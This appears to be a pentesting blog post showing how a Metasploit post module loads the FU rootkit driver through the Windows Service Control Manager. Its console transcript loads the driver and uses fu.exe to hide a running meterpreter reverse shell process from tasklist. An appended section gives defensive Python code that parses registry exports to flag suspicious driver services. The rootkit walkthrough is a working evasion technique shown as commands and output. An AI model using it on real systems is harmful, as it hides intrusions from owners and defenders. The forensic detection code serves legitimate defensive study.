Since life in kernel space is more stealthy, you may want to load your own rootkit kernel driver to hide your shell, a process, a connection, etc., and thus make your post-exploitation work more covert. Not only rootkits but other kinds of drivers can be really useful for a pentester. For example, we can load the packet capture driver (npf.sys) from WinPcap if we intend to sniff or inject packets into the network to carry out further attacks.
A good and comfortable way to load drivers is by using the Service Control Manager (SCM) API, which allows you to register and load a kernel driver in a safe way through functions such as CreateServiceA, OpenSCManagerA and OpenServiceA. Taking advantage of the Services mixin, I made a simple module to achieve this from Meterpreter. Let's see an example with the well-known FU rootkit driver.
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/driver_loader
msf post(driver_loader) > set driver_name FU_RK
driver_name => FU_RK
msf post(driver_loader) > set driver_path c:\\windows\\system32\\drivers\\fu.sys
driver_path =>c:\windows\system32\drivers\fu.sys
msf post(driver_loader) > set session 1
session => 1
msf post(driver_loader) > show options
Module options (post/windows/manage/driver_loader):
Name Current Setting Required Description
---- --------------- -------- -----------
DRIVER_NAME FU_RK yes Driver Name.
DRIVER_PATH c:\windows\system32\drivers\fu.sys yes Driver path in %SYSTEMROOT%.Example: c:\windows\system32\msf.sys
ERROR_TYPE ignore yes Error type. (accepted: ignore, normal, severe, critical)
SERVICE_TYPE kernel yes Service type. (accepted: kernel, file_system, adapter, recognizer)
SESSION 1 yes The session to run this module on.
START_TYPE auto yes Start type. (accepted: boot, system, auto, demand, disabled)
msf post(driver_loader) > exploit
[*] Service object added to the Service Control Manager database.
[+] Driver loaded successfully.
[*] Post module execution completed
We can verify that the driver was loaded successfully.
Now we can use fu.exe to hide some processes.
meterpreter > shell
Process 1972 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Test\Desktop>cd %TEMP%
cd %TEMP%
C:\DOCUME~1\Test\LOCALS~1\Temp>tasklist | findstr "meterpreter_reverse"
tasklist | findstr "meterpreter_reverse"
meterpreter_reverse.exe 1628 Console 0 7.360 K
C:\DOCUME~1\Test\LOCALS~1\Temp>fu -ph 1628
fu -ph 1628
C:\DOCUME~1\Test\LOCALS~1\Temp>tasklist | findstr "meterpreter_reverse"
tasklist | findstr "meterpreter_reverse"
C:\DOCUME~1\Test\LOCALS~1\Temp>
Note that a drawback of using the SCM is that once the service has been installed it leaves artifacts in the registry under HKLM\SYSTEM\CurrentControlSet\Services, which may raise suspicion from a forensic point of view.
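The registry artifacts mentioned above are exactly what a forensic analyst looks for after a suspected driver load through the SCM: the CreateService call described earlier writes a new subkey under HKLM\SYSTEM\CurrentControlSet\Services with Type, Start, ErrorControl and ImagePath values. The following is an added example, not code from the post or from the Metasploit module, that parses a `reg export` of that key (the .reg text format, including UTF-16LE `hex(2)` REG_EXPAND_SZ values with line continuations), keeps only kernel and file-system driver services, and compares them against a known-good export from a clean build of the same image. The two sample exports are constructed for this example; the FU_RK entry mirrors the values the driver_loader run above would leave (kernel type, auto start, ErrorControl "ignore", fu.sys under system32\drivers), and the "tmpdrv" entry is a made-up second driver registered from a user-writable directory to show the path heuristic. Note that FU_RK is only caught by the baseline comparison, since its binary sits in the expected drivers directory.

```python
import re

SERVICE_KERNEL_DRIVER = 0x1        # SCM service type values as stored in "Type"
SERVICE_FILE_SYSTEM_DRIVER = 0x2
START_NAMES = {0: "boot", 1: "system", 2: "auto", 3: "demand", 4: "disabled"}
_VALUE_RE = re.compile(r'^"(?P<name>(?:[^"\\]|\\.)+)"=(?P<data>.*)$')

# Constructed sample export of HKLM\SYSTEM\CurrentControlSet\Services from a clean build.
# REG_EXPAND_SZ values appear as UTF-16LE hex(2) data wrapped with trailing backslashes.
BASELINE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Beep]
"Type"=dword:00000001
"Start"=dword:00000001
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,64,\
  00,72,00,69,00,76,00,65,00,72,00,73,00,5c,00,62,00,65,00,65,00,70,00,2e,00,\
  73,00,79,00,73,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Beep\Enum]
"Count"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]
"Type"=dword:00000110
"Start"=dword:00000002
"ImagePath"="%SystemRoot%\\system32\\spoolsv.exe"
"""

# Constructed export of the same machine after a driver_loader run (FU_RK mirrors the
# module defaults shown in the post) plus a made-up driver registered from %TEMP%.
SUSPECT_EXPORT = BASELINE_EXPORT + r"""
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FU_RK]
"Type"=dword:00000001
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"="c:\\windows\\system32\\drivers\\fu.sys"
"DisplayName"="FU_RK"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\tmpdrv]
"Type"=dword:00000001
"Start"=dword:00000003
"ErrorControl"=dword:00000000
"ImagePath"="\\??\\C:\\DOCUME~1\\Test\\LOCALS~1\\Temp\\tmpdrv.sys"
"""


def _decode_data(data):
    """Decode one .reg value body: dword -> int, hex(1)/hex(2) -> str, other hex -> bytes, "..." -> str."""
    if data.startswith("dword:"):
        return int(data[6:], 16)
    m = re.match(r"hex(?:\((?P<kind>[0-9a-f]+)\))?:(?P<body>.*)$", data, re.I)
    if m:
        raw = bytes(int(b, 16) for b in m.group("body").split(",") if b)
        if m.group("kind") in ("1", "2"):      # REG_SZ / REG_EXPAND_SZ are UTF-16LE
            return raw.decode("utf-16-le").rstrip("\x00")
        return raw
    if len(data) >= 2 and data[0] == data[-1] == '"':
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return data


def parse_reg_export(text):
    """Parse a .reg export into {key_path: {value_name: decoded_data}}."""
    keys, current, pending = {}, None, ""
    for raw in text.lstrip("\ufeff").splitlines():
        line = pending + raw.strip()
        pending = ""
        if line.endswith("\\"):                 # hex data continues on the next line
            pending = line[:-1]
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        else:
            m = _VALUE_RE.match(line)
            if m and current is not None:
                keys[current][m.group("name")] = _decode_data(m.group("data"))
    return keys


def _normalise_image_path(path):
    """Lower-case and strip the NT / %SystemRoot% prefixes so paths compare uniformly."""
    p = str(path).lower()
    for prefix in ("\\??\\", "\\systemroot\\", "%systemroot%\\", "c:\\windows\\"):
        if p.startswith(prefix):
            p = p[len(prefix):]
    return p


def driver_services(keys):
    """Direct children of ...\\Services whose Type is a kernel or file-system driver."""
    out = {}
    for path, values in keys.items():
        idx = path.lower().find("\\services\\")
        name = path[idx + 10:] if idx >= 0 else ""
        if name and "\\" not in name and values.get("Type") in (SERVICE_KERNEL_DRIVER, SERVICE_FILE_SYSTEM_DRIVER):
            out[name] = values
    return out


def triage(baseline_text, suspect_text):
    """Flag driver services that are new relative to the baseline or run from unusual locations."""
    known = driver_services(parse_reg_export(baseline_text))
    findings = []
    for name, values in sorted(driver_services(parse_reg_export(suspect_text)).items()):
        reasons = []
        if name not in known:
            reasons.append("not present in baseline")
        image = values.get("ImagePath", "")
        if not _normalise_image_path(image).startswith("system32\\drivers\\"):
            reasons.append("binary outside System32\\drivers")
        if reasons:
            findings.append({"service": name, "start": START_NAMES.get(values.get("Start"), "unknown"),
                             "image_path": image, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(BASELINE_EXPORT, SUSPECT_EXPORT):
        print(f"{f['service']:<8} start={f['start']:<7} {f['image_path']}  <- {'; '.join(f['reasons'])}")
```

On a real case the two exports come from `reg export HKLM\SYSTEM\CurrentControlSet\Services <file>` (or from an offline SYSTEM hive converted to the same format), and the baseline should be taken from the same build and patch level so that legitimately added drivers do not show up as noise; a driver present in the baseline but with a changed ImagePath is worth a second comparison of the values themselves.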